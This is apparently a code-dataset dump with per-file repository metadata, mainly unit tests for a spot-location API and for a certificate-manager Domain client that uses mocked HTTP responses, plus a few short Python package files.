mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner or mid spot",
)
spot_ids[spot["id"]] = 2
# Testing the outer ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 110,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 12, "Returns 12 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
# testing a limit - should get the inner 4, and any 2 of the mid
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 60,
"limit": 6,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 6, "Returns 6 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
self.assertEquals(
spot_ids[inner_left.pk], 2, "Inner left was selected"
)
self.assertEquals(
spot_ids[inner_right.pk], 2, "Inner right was selected"
)
self.assertEquals(spot_ids[inner_top.pk], 2, "Inner top was selected")
self.assertEquals(
spot_ids[inner_bottom.pk], 2, "Inner bottom was selected"
)
# Testing limits - should get all of the inner and mid, but
# no outer spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 101,
"limit": 8,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 8, "Returns 8 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner or mid spot",
)
spot_ids[spot["id"]] = 2
# Testing limits - should get all inner and mid spots, and
# 2 outer spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 101,
"limit": 10,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 10, "Returns 10 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
self.assertEquals(
spot_ids[inner_left.pk], 2, "Inner left was selected"
)
self.assertEquals(
spot_ids[inner_right.pk], 2, "Inner right was selected"
)
self.assertEquals(spot_ids[inner_top.pk], 2, "Inner top was selected")
self.assertEquals(
spot_ids[inner_bottom.pk], 2, "Inner bottom was selected"
)
self.assertEquals(spot_ids[mid_left.pk], 2, "Mid left was selected")
self.assertEquals(spot_ids[mid_right.pk], 2, "Mid rightwas selected")
self.assertEquals(spot_ids[mid_top.pk], 2, "Mid top was selected")
self.assertEquals(
spot_ids[mid_bottom.pk], 2, "Mid bottom was selected"
)
# Testing that limit 0 = no limit - get all 12 spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 110,
"limit": 0,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 12, "Returns 12 spots with a limit of 0")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
# Testing that the default limit is 20 spaces
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 150,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(
len(spots), 20, "Returns 20 spots with no defined limit"
)
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
far_out_count = 0
for spot in spots:
if spot["id"] in spot_ids:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
else:
far_out_count += 1
self.assertEquals(
far_out_count,
8,
"Found 8 far out spots to fill in the limit of 20",
)
# Testing that with a limit of 0, we pull in all spots in range
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 130,
"limit": 0,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(
len(spots), 112, "Returns 112 spots with a limit of 0"
)
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
far_out_count = 0
for spot in spots:
if spot["id"] in spot_ids:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
else:
far_out_count += 1
self.assertEquals(far_out_count, 100, "Found all 100 far out spots")
| 31.864035 | 79 | 0.501491 | 2,302 | 21,795 | 4.622068 | 0.085578 | 0.024812 | 0.108271 | 0.084492 | 0.827726 | 0.769173 | 0.765977 | 0.755921 | 0.729981 | 0.726974 | 0 | 0.041821 | 0.391099 | 21,795 | 683 | 80 | 31.910688 | 0.759928 | 0.044873 | 0 | 0.592652 | 0 | 0 | 0.198384 | 0.002405 | 0 | 0 | 0 | 0 | 0.127796 | 1 | 0.015974 | false | 0 | 0.014377 | 0 | 0.031949 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4c0ab34e213a6cac6f714e8bdb911bff09620f44
| 24,467 |
py
|
Python
|
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | 1 |
2022-03-17T16:33:46.000Z
|
2022-03-17T16:33:46.000Z
|
# -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that happen as that is part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
as well add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
The function should return an error code and description if the Domain
creation failed.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(unexpected HTTP status code).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(no Location header in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(Domain ID not found in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
| 32.666222 | 107 | 0.647484 | 2,928 | 24,467 | 5.28791 | 0.084358 | 0.033714 | 0.052961 | 0.063554 | 0.838468 | 0.805206 | 0.787896 | 0.776335 | 0.761997 | 0.743913 | 0 | 0.015535 | 0.250174 | 24,467 | 748 | 108 | 32.709893 | 0.828409 | 0.243389 | 0 | 0.649867 | 0 | 0 | 0.083385 | 0.048448 | 0 | 0 | 0 | 0 | 0.175066 | 1 | 0.114058 | false | 0 | 0.015915 | 0 | 0.167109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4c0dc6446f67b743dcdbd74576706d0d6a1843b4
| 118 |
py
|
Python
|
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
[
"MIT"
] | null | null | null |
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
[
"MIT"
] | 1 |
2021-12-14T06:05:26.000Z
|
2021-12-14T06:05:26.000Z
|
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
[
"MIT"
] | null | null | null |
from .functions import monitor_watchlist_action, manager
with manager.get_dagr():
monitor_watchlist_action()
| 23.6 | 57 | 0.788136 | 14 | 118 | 6.285714 | 0.714286 | 0.363636 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144068 | 118 | 4 | 58 | 29.5 | 0.871287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
4c26e9b14a57dad62c0722a56d9cd088844722fb
| 97 |
py
|
Python
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3 |
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23 |
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
| 13.857143 | 37 | 0.731959 | 13 | 97 | 5.076923 | 0.692308 | 0.393939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185567 | 97 | 6 | 38 | 16.166667 | 0.835443 | 0.041237 | 0 | 0 | 0 | 0 | 0.043956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 |
0
| 6 |
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
| 225 |
py
|
Python
|
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 37.5 | 52 | 0.888889 | 26 | 225 | 7.461538 | 0.576923 | 0.231959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 225 | 5 | 53 | 45 | 0.946341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
4c4972e50ba94dc3591b0fc9fac43e37a601a455
| 25 |
py
|
Python
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
